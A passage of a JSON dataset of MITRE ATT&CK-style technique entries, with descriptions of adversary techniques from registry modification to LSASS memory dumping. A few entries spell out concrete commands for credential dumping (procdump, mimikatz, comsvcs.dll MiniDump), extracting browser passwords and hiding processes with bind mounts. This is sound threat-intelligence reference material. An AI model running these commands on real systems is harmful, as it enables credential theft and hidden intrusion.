an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to Escape to Host and access other containers running on the node. Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes. Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.", "detection": ""}, {"attack_id": "T1112", "name": "Modify Registry", "tactics": ["defense-impairment", "persistence"], "platforms": ["Windows"], "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution. Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API. The Registry may be modified in order to hide configuration information or malicious payloads via Obfuscated Files or Information. The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory. The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. Often Valid Accounts are required, along with access to the remote system's SMB/Windows Admin Shares for RPC communication. Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.", "detection": ""}, {"attack_id": "T1543.004", "name": "Launch Daemon", "tactics": ["persistence", "privilege-escalation"], "platforms": ["macOS"], "description": "Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks. Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. Masquerading). When the Launch Daemon is executed, the program inherits administrative permissions. Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.", "detection": ""}, {"attack_id": "T1580", "name": "Cloud Infrastructure Discovery", "tactics": ["discovery"], "platforms": ["IaaS"], "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket. Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project , and Azure's CLI command az vm list lists details of virtual machines. In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through Wordlist Scanning. An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user. The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.", "detection": ""}, {"attack_id": "T1555.003", "name": "Credentials from Web Browsers", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager. Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials. After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "detection": ""}, {"attack_id": "T1574.008", "name": "Path Interception by Search Order Hijacking", "tactics": ["stealth", "execution"], "platforms": ["Windows"], "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike DLL search order hijacking, the search order differs depending on the method that is used to execute the program. However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory. For example, \"example.exe\" runs \"cmd.exe\" with the command-line argument net user. An adversary may place a program called \"net.exe\" within the same directory as example.exe, \"net.exe\" will be run instead of the Windows system utility net. In addition, if an adversary places a program called \"net.com\" in the same directory as \"net.exe\", then cmd.exe /C net user will execute \"net.com\" instead of \"net.exe\" due to the order of executable extensions defined under PATHEXT. Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL.", "detection": ""}, {"attack_id": "T1491", "name": "Defacement", "tactics": ["impact"], "platforms": ["Windows", "IaaS", "Linux", "macOS", "ESXi"], "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.", "detection": ""}, {"attack_id": "T1535", "name": "Unused/Unsupported Cloud Regions", "tactics": ["stealth"], "platforms": ["IaaS"], "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure. Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.", "detection": ""}, {"attack_id": "T1557.003", "name": "DHCP Spoofing", "tactics": ["credential-access", "collection"], "platforms": ["Linux", "Windows", "macOS"], "description": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients. The typical server-client interaction is as follows: 1. The client broadcasts a `DISCOVER` message. 2. The server responds with an `OFFER` message, which includes an available network address. 3. The client broadcasts a `REQUEST` message, which includes the network address offered. 4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters. Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers. Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network. DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address. Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations. Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, Service Exhaustion Flood) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool.", "detection": ""}, {"attack_id": "T1563", "name": "Remote Service Session Hijacking", "tactics": ["lateral-movement"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service. Adversaries may commandeer these sessions to carry out actions on remote systems. Remote Service Session Hijacking differs from use of Remote Services because it hijacks an existing session rather than creating a new session using Valid Accounts.", "detection": ""}, {"attack_id": "T1564.013", "name": "Bind Mounts", "tactics": ["stealth"], "platforms": ["Linux"], "description": "Adversaries may abuse bind mounts on file structures to hide their activity and artifacts from native utilities. A bind mount maps a directory or file from one location on the filesystem to another, similar to a shortcut on Windows. It’s commonly used to provide access to specific files or directories across different environments, such as inside containers or chroot environments, and requires sudo access. Adversaries may use bind mounts to map either an empty directory or a benign `/proc` directory to a malicious process’s `/proc` directory. Using the commands `mount –o bind /proc/benign-process /proc/malicious-process` (or `mount –B`), the malicious process's `/proc` directory is overlayed with the contents of a benign process's `/proc` directory. When system utilities query process activity, such as `ps` and `top`, the kernel follows the bind mount and presents the benign directory’s contents instead of the malicious process's actual `/proc` directory. As a result, these utilities display information that appears to come from the benign process, effectively hiding the malicious process's metadata, executable, or other artifacts from detection.", "detection": ""}, {"attack_id": "T1027.001", "name": "Binary Padding", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures. The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware. Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.", "detection": ""}, {"attack_id": "T1505.003", "name": "Web Shell", "tactics": ["persistence"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. China Chopper Web shell client).", "detection": ""}, {"attack_id": "T1484.001", "name": "Group Policy Modification", "tactics": ["defense-impairment", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`. Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain. Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more. Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse. For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml. In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.", "detection": ""}, {"attack_id": "T1685.006", "name": "Clear Linux or Mac System Logs", "tactics": ["defense-impairment"], "platforms": ["Linux", "macOS"], "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as: * `/var/log/messages:`: General and system-related messages * `/var/log/secure or /var/log/auth.log`: Authentication logs * `/var/log/utmp or /var/log/wtmp`: Login records * `/var/log/kern.log`: Kernel logs * `/var/log/cron.log`: Crond logs * `/var/log/maillog`: Mail server logs * `/var/log/httpd/`: Web server access and error logs", "detection": ""}, {"attack_id": "T1217", "name": "Browser Information Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. Browser information may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser. Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).", "detection": ""}, {"attack_id": "T1552.004", "name": "Private Keys", "tactics": ["credential-access"], "platforms": ["Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates. When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity. An adversary with access to the device may be able to export the keys in order to impersonate the device. On network devices, private keys may be exported via Network Device CLI commands such as `crypto pki export`. Some private keys require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line. These private keys can be used to authenticate to Remote Services like SSH or for use in decrypting other collected files such as email.", "detection": ""}, {"attack_id": "T1583.004", "name": "Server", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in Drive-by Compromise, enabling Phishing operations, or facilitating Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.", "detection": ""}, {"attack_id": "T1021.006", "name": "Windows Remote Management", "tactics": ["lateral-movement"], "platforms": ["Windows"], "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the `winrm` command or by any number of programs such as PowerShell. WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.", "detection": ""}, {"attack_id": "T1011.001", "name": "Exfiltration Over Bluetooth", "tactics": ["exfiltration"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel. Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.", "detection": ""}, {"attack_id": "T1078.001", "name": "Default Accounts", "tactics": ["stealth", "persistence", "privilege-escalation", "initial-access"], "platforms": ["Containers", "ESXi", "IaaS", "Identity Provider", "Linux", "macOS", "Network Devices", "Office Suite", "SaaS", "Windows"], "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes. Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services. Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via Exploitation for Credential Access on the vCenter host), they will then have access to the ESXi server.", "detection": ""}, {"attack_id": "T1547.003", "name": "Time Providers", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\`. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.", "detection": ""}, {"attack_id": "T1546.005", "name": "Trap", "tactics": ["privilege-escalation", "persistence"], "platforms": ["macOS", "Linux"], "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.", "detection": ""}, {"attack_id": "T1574.006", "name": "Dynamic Linker Hijacking", "tactics": ["stealth", "execution"], "platforms": ["Linux", "macOS"], "description": "Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. Each platform's linker uses an extensive list of environment variables at different points in execution. These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions in the original library. Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. On Linux, adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. For example, adversaries have used `LD_PRELOAD` to inject a malicious library into every descendant process of the `sshd` daemon, resulting in execution under a legitimate process. When the executing sub-process calls the `execve` function, for example, the malicious library’s `execve` function is executed rather than the system function `execve` contained in the system library on disk. This allows adversaries to Hide Artifacts from detection, as hooking system functions such as `execve` and `readdir` enables malware to scrub its own artifacts from the results of commands such as `ls`, `ldd`, `iptables`, and `dmesg`. Hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges.", "detection": ""}, {"attack_id": "T1136.001", "name": "Local Account", "tactics": ["persistence"], "platforms": ["Containers", "ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. For example, with a sufficient level of access, the Windows net user /add command can be used to create a local account. In Linux, the `useradd` command can be used, while on macOS systems, the dscl -create command can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such as username, to ESXi servers via `esxcli system account add`, or to Kubernetes clusters using the `kubectl` utility. Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "detection": ""}, {"attack_id": "T1681", "name": "Search Threat Vendor Data", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Threat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. These reports may include descriptions of behavior, detailed breakdowns of attacks, atomic indicators such as malware hashes or IP addresses, timelines of a group’s activity, and more. Adversaries may change their behavior when planning their future operations. Adversaries have been observed replacing atomic indicators mentioned in blog posts in under a week. Adversaries have also been seen searching for their own domain names in threat vendor data and then taking them down, likely to avoid seizure or further investigation. This technique is distinct from Threat Intel Vendors in that it describes threat actors performing reconnaissance on their own activity, not in search of victim information.", "detection": ""}, {"attack_id": "T1674", "name": "Input Injection", "tactics": ["execution"], "platforms": ["Windows", "macOS", "Linux"], "description": "Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs). For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions. Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.", "detection": ""}, {"attack_id": "T1092", "name": "Communication Through Removable Media", "tactics": ["command-and-control"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", "detection": ""}, {"attack_id": "T1585.002", "name": "Email Accounts", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to Acquire Infrastructure for follow-on purposes. Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains). To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.", "detection": ""}, {"attack_id": "T1557.001", "name": "Name Resolution Poisoning and SMB Relay", "tactics": ["credential-access", "collection"], "platforms": ["Windows"], "description": "By responding to LLMNR/NBT-NS/mDNS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. Multicast Domain Name System(mDNS) is a zero-configuration service used to resolve hostnames to IP addresses with “.local” as a top-level domain. MDNS is based upon Domain Name System (DNS) format and allows hosts on the same network segment to perform name resolution for other hosts, using multicast. Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137)/mDNS (UDP 5353) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various other protocols, such as LDAP, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.", "detection": ""}, {"attack_id": "T1222", "name": "File and Directory Permissions Modification", "tactics": ["defense-impairment"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow. Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.", "detection": ""}, {"attack_id": "T1003.001", "name": "LSASS Memory", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * procdump -ma lsass.exe lsass_dump Locally, mimikatz can be run using: * sekurlsa::Minidump lsassdump.dmp * sekurlsa::logonPasswords Built-in Windows tools such as `comsvcs.dll` can also be used: * rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full Similar to Image File Execution Options Injection, the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`). Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. The following SSPs can be used to access credentials: * Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. * Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. * Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. * CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.", "detection": ""}, {"attack_id": "T1176.002", "name": "IDE Extensions", "tactics": ["persistence"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems. IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., Compromise Software Dependencies and Development Tools) or side-loaded directly into the IDE. In addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., IDE Tunneling). Trust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.", "detection": ""}, {"attack_id": "T1595", "name": "Active Scanning", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction. Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Exploit Public-Facing Application).", "detection": ""}, {"attack_id": "T1027.016", "name": "Junk Code Insertion", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with Compression or Software Packing. No-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them. The use of junk / dead code insertion is distinct from 